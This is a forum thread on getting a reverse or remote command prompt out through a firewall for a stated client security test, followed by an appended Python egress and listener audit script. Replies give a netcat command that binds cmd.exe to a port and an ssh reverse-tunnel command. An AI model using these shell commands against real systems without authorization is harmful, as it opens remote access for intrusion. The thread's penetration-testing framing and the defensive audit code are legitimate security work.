
Thread: Reverse Command Prompt Suggestions

  1. #1
    Join Date
    Sep 2003

    Reverse Command Prompt Suggestions

    I didn't know exactly which forum to post this question in. I thought this would be the most logical.

    I am conducting a test of technical security controls for a client and I'm looking for the easiest way to do this. I mainly want to test their IDS and AV capabilities. This is not a comprehensive test of their systems, just a part, as you can see.

    I would like your suggestions on programs that can spawn a remote command prompt outbound through a firewall via a specific port from a WinXP box. The delivery method is a non-problem. I will ensure the files get on the system. Mainly I just need to have the shell get sent out of the firewall so I can connect to it.

    Any thoughts would be appreciated. Simplicity is key here. As mentioned before this is not a comprehensive test, just a one off.


  2. #2
    AO Senior Cow-beller
    zencoder
    Join Date
    Dec 2004
    Mountain standard tribe.

    netcat is your friend

    netcat is one way.


    That's after a really quick search and scan. I think it'll tell you how. Too lazy to look harder, but your Google terms should include: netcat shovel shell

    caveat h4x0r - use of netcat may, can, and WILL likely get you fired if you don't have explicit permission and authorization.
    "Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
    Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
    "...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore

  3. #3
    Right turn Clyde
    Nokia
    Join Date
    Aug 2003
    Button Moon
    Netcat is prolly the ideal way, as has been suggested:

    nc -l -p 23 -t -e cmd.exe

    nc = netcat
    -l = listen
    -p = port (to be listened on)
    23 = port number to be listened on (telnet in this case)
    -t = tells it to answer telnet negotiation
    -e = execute
    cmd.exe = [execute] command prompt

    So in a nutshell, nc will listen on port 23 for a connection; when you connect it will execute the command prompt.

    Bear in mind though that if you are doing this on an enterprise network nc will sit in front of whatever should be running on that port. So if you ran it on port 139, 445 etc. it would be sitting in front of legitimate NetBIOS/file sharing applications.
    Drugs have taught an entire generation of kids the metric system.


  4. #4
    Senior Member
    br_fusion
    Join Date
    Apr 2002
    This is pertaining to Linux, but if this WinXP machine had Cygwin or similar, you could try using ssh.

    Create an ssh tunnel from behind the firewall to the outside system.
    "ssh -v -R 2222:localhost:22 outsideIP"

    Then from the outside computer, connect to the localhost.
    "ssh -p 2222 localhost"

    This might not help you, but good to keep your options open in case.
    The command completed successfully.

    "They drew first blood not me."

  5. #5
    Just Another Geek
    Join Date
    Jul 2002
    Rotterdam, Netherlands
    A reverse command prompt means the victim's machine connects back to the attacker, not the attacker connecting to the victim.

    So I would have a netcat listening on a certain port, fire my exploit at the target, the target connects back to my netcat giving me a command prompt.. You can use this when the target doesn't allow incoming connections but does allow outgoing connections.. This is the reason you should monitor/firewall egress network traffic..
    Oliver's Law:
    Experience is something you don't get until just after you need it.
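Two defensive points in this thread, Nokia's warning that a netcat listener on 139/445 sits in front of the legitimate service, and the closing remark that egress traffic should be monitored and firewalled, can be turned into a simple host-side check. The following is an added example and not code from any poster. It parses constructed netstat-style lines (the sample data, the process names and the expected-owner table are all assumptions made for the example) and flags listeners on well-known ports owned by an unexpected process, listeners owned by shell-type binaries, and outbound connections that come from a shell process or go to a port outside the approved egress list.

```python
"""Egress and listener audit over netstat-style connection records (example only)."""
from dataclasses import dataclass

# Constructed sample, not captured from a real host. Columns are:
# proto local_addr local_port remote_addr remote_port state process
SAMPLE_CONNECTIONS = """\
TCP 0.0.0.0 23 0.0.0.0 0 LISTENING nc.exe
TCP 0.0.0.0 445 0.0.0.0 0 LISTENING System
TCP 0.0.0.0 8080 0.0.0.0 0 LISTENING nc.exe
TCP 10.0.0.5 1043 203.0.113.9 443 ESTABLISHED cmd.exe
TCP 10.0.0.5 1044 10.0.0.20 445 ESTABLISHED System
TCP 10.0.0.5 1050 198.51.100.7 80 ESTABLISHED iexplore.exe
TCP 10.0.0.5 1051 203.0.113.9 6667 ESTABLISHED svchost.exe
"""

# Assumed policy for the example host: which process should own each
# well-known listening port, which binaries count as shells, and which
# destination ports are approved for outbound traffic.
EXPECTED_LISTENERS = {23: {"tlntsvr.exe"}, 135: {"svchost.exe"},
                      139: {"System"}, 445: {"System"}}
SHELL_PROCESSES = {"cmd.exe", "nc.exe", "netcat.exe", "powershell.exe",
                   "sh.exe", "bash.exe"}
ALLOWED_EGRESS_PORTS = {80, 443}


@dataclass(frozen=True)
class Conn:
    proto: str
    laddr: str
    lport: int
    raddr: str
    rport: int
    state: str
    process: str


def parse_connections(text: str) -> list[Conn]:
    """Parse whitespace-separated records; lines that do not have 7 fields are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue
        proto, laddr, lport, raddr, rport, state, proc = parts
        conns.append(Conn(proto, laddr, int(lport), raddr, int(rport), state, proc))
    return conns


def is_internal(addr: str) -> bool:
    """RFC 1918, loopback and unspecified IPv4 addresses count as internal."""
    o = [int(x) for x in addr.split(".")]
    return (o[0] in (0, 10, 127)
            or (o[0] == 192 and o[1] == 168)
            or (o[0] == 172 and 16 <= o[1] <= 31))


def audit(conns: list[Conn]) -> list[tuple[str, int, str]]:
    """Return (finding, port, process) triples for records that violate the policy."""
    findings = []
    for c in conns:
        proc = c.process.lower()
        if c.state == "LISTENING":
            expected = EXPECTED_LISTENERS.get(c.lport)
            if expected is not None and c.process not in expected:
                # Something other than the legitimate service owns a well-known port.
                findings.append(("unexpected_listener", c.lport, c.process))
            elif proc in SHELL_PROCESSES:
                # A shell binary is waiting for inbound connections on any port.
                findings.append(("shell_listener", c.lport, c.process))
        elif c.state == "ESTABLISHED" and not is_internal(c.raddr):
            if proc in SHELL_PROCESSES:
                # A shell holding an outbound connection is the reverse-shell pattern.
                findings.append(("shell_egress", c.rport, c.process))
            elif c.rport not in ALLOWED_EGRESS_PORTS:
                findings.append(("unapproved_egress_port", c.rport, c.process))
    return findings


if __name__ == "__main__":
    for finding in audit(parse_connections(SAMPLE_CONNECTIONS)):
        print(*finding)
```

On a real host the input would come from `netstat -ano` joined against the process list, and the expected-owner table would be taken from a known-good baseline of the same build; the point of the check is that both the listener-in-front-of-a-service case and the connect-back case are visible from the host's own connection table, independent of what the IDS sees on the wire.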
